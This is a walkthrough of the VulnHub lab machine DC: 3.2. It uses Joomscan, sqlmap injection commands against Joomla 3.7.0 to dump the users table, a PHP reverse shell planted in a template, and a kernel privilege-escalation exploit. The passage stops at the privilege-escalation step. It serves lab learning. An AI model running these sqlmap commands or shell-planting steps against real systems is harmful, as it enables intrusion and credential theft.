DC 3.2- Writeup - Freedium

In this guide, I will take you through the detailed steps and techniques that I used to exploit and gain root access to this machine and finding the flag.

You can download the machine from vulnhub.com or by the link given below

DC: 3.2 DC: 3.2, made by DCAU. Download & walkthrough links are available.

The objective of this task is to find the flag in root directory.

First we will find its ip. Here I used the tool called netdiscover.

Now we got its ip, Let's scan it

There is a web service running since port 80 is open.

Checking from its source code there is nothing interesting there.

Then I done directory bruteforcing using gobuster and found an administrator page.

From the tool wappalyzer we can see that the page is developed using PHP and Joomla is used as CMS(Content Management System).

There are so many vulnerability scanners we can use to find weakness and other details of a webpage. One of such tool is Joomscan.

Here, I used Joomscan since the page is built using Joomla.

joomscan -u http://10.0.2.5/administrator/

From there, i got that Joomla version 3.7.0 is used and luckily there is a vulnerability.

We can search in exploitdb or in searchsploit.

Since sql injection is possible we can use the tool sqlmap to gain the database.

We can use the sql command that is given in the exploitdb.

Lets run the command

Before that change the localhost to machine ip.

Also when running the command it will ask permission then type "Y" and enter

sqlmap -u "http://10.0.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://10.0.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

This Database called Joomlabd seems interesting. Lets find the tables in it.

sqlmap -u "http://10.0.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

sqlmap -u "http://10.0.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

Now we got the table. There is one called users.

We found users, so we will dump columns in the users table.

sqlmap -u "http://10.0.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns --dump -p list[fullordering]

sqlmap -u "http://10.0.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns --dump -p list[fullordering]

We need the username and password, so lets dump it.

sqlmap -u "http://10.0.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C username,password --dump -p list[fullordering]

sqlmap -u "http://10.0.2.5/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C username,password --dump -p list[fullordering]

We got the username as admin and its password hash.

You can use john or other methods to crack the hash. Here, I used hashes.com(webpage).

Lets login to the page.

Now, I got access to the admin page but this is the admin of webpage. Our task is to be the root user of the machine. So lets search here for any upload options in this account. Once we got any, we can use to gain a reverse shell.

In templates page there are 2 templates. Lets delect one and see if there is any possibility for reverse shell. In each templates, there is index.php where we can upload a php reverse shell.

Here, I used error.php and other files in the template but it was only working in index.php . So lets go with that.

In google, search for php reverse shell and we find a github page called pentest monkey. This code is widely used for gaining access through reverse shell. Lets copy the code.

Now remove the commands in index.php and replace it with our php reverse shell code. Before saving the file, change the ip address to our Kali's ip and port as your wish.

Now save.

Lets start listening using netcat in the given port

Now only thing to do is refresh the index page.

We got the shell.

The user is www-data and its not an interactive shell.

To become root, we need to find any vulnerability so that we can escalate our privilege.

Lets find about the OS.

lsb_release -a

Its ubuntu 16.04

It has got so many exploits when we search in searchsploit and in exploitdb.

Among those double fdput is an interesting one.

BPF (Berkeley Packet Filter) is a technology in the Linux kernel used for Network packet filtering, Traffic monitoring, Security tools, Performance analysis.

The Double-fdput() BPF(BPF_PROG_LOAD) vulnerability is a local privilege escalation flaw in the Linux kernel's eBPF subsystem. The vulnerability arises from improper file descriptor reference handling, where a file descriptor reference is released twice, leading to kernel memory corruption. A local attacker can exploit this condition through crafted BPF program loading requests and potentially obtain root privileges on the affected system. The vulnerability highlights the risks associated with memory management errors in privileged kernel components.